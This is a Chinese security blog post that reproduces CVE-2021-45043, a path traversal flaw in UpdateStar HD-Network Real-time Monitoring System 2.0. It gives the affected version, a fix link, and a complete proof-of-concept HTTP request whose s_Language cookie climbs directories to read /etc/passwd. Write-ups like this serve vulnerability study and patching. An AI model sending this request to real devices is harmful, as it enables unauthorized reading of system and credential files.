UpdateStar HD-Network Real-time Monitoring路径遍历漏洞(CVE-2021-45043)

admin 2023年5月18日09:08:21评论78 views字数 1152阅读3分50秒阅读模式


网安引领时代,弥天点亮未来   





 

UpdateStar HD-Network Real-time Monitoring路径遍历漏洞(CVE-2021-45043)

0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
UpdateStar HD-Network Real-time Monitoring路径遍历漏洞(CVE-2021-45043)

0x01漏洞介绍
UpdateStar HD-Network Real-time Monitoring System是德国UpdateStar公司的一个高清网络实时监控系统。
UpdateStar HD-Network Real-time Monitoring System 2.0 存在安全漏洞,该漏洞允许攻击者通过/language/lang s_Language参数进行../目录遍历攻击,从而读取/etc/shadow。



UpdateStar HD-Network Real-time Monitoring路径遍历漏洞(CVE-2021-45043)

0x02影响版本

UpdateStar HD-Network Real-time Monitoring System 2.0 存在安全漏洞

UpdateStar HD-Network Real-time Monitoring路径遍历漏洞(CVE-2021-45043)


UpdateStar HD-Network Real-time Monitoring路径遍历漏洞(CVE-2021-45043)

0x03漏洞复现

1.访问漏洞环境

UpdateStar HD-Network Real-time Monitoring路径遍历漏洞(CVE-2021-45043)

2.对漏洞进行复现

POC

GET /language/lang HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36Connection: closeCookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=Referer: Accept-Encoding: gzip

执行漏洞poc

UpdateStar HD-Network Real-time Monitoring路径遍历漏洞(CVE-2021-45043)

3.nuclei工具测试(漏洞存在)

UpdateStar HD-Network Real-time Monitoring路径遍历漏洞(CVE-2021-45043)


UpdateStar HD-Network Real-time Monitoring路径遍历漏洞(CVE-2021-45043)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://hd-network-realtime-monitoring-system.updatestar.com/


弥天简介

学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。

口号 网安引领时代,弥天点亮未来


















UpdateStar HD-Network Real-time Monitoring路径遍历漏洞(CVE-2021-45043) 


知识分享完了

喜欢别忘了关注我们哦~


学海浩茫,

予以风动,
必降弥天之润!


   弥  天

安全实验室

UpdateStar HD-Network Real-time Monitoring路径遍历漏洞(CVE-2021-45043)


原文始发于微信公众号(弥天安全实验室):UpdateStar HD-Network Real-time Monitoring路径遍历漏洞(CVE-2021-45043)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月18日09:08:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   UpdateStar HD-Network Real-time Monitoring路径遍历漏洞(CVE-2021-45043)https://cn-sec.com/archives/1742308.html

发表评论

匿名网友 填写信息